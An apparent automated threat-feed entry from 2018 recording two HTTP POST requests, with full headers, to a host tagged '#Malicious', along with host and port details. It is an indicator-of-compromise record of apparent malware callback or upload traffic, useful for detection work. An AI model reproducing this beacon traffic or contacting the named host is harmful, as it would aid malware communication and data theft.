POST /ca/ HTTP/1.1 Host: www.jcygtpu.com Connection: close Content-Length: 2202 Cache-Control: no-cache Origin: http://www.jcygtpu.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.jcygtpu.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.jcygtpu.com/ca/
- Hostname: www.jcygtpu.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.jcygtpu.com Connection: close Content-Length: 57310 Cache-Control: no-cache Origin: http://www.jcygtpu.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.jcygtpu.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Detected family: #Malicious
TheSystem Itself @ 2018-11-08 12:20:03
#infosec #automation
TheSystem Itself @ 2018-11-08 12:15:21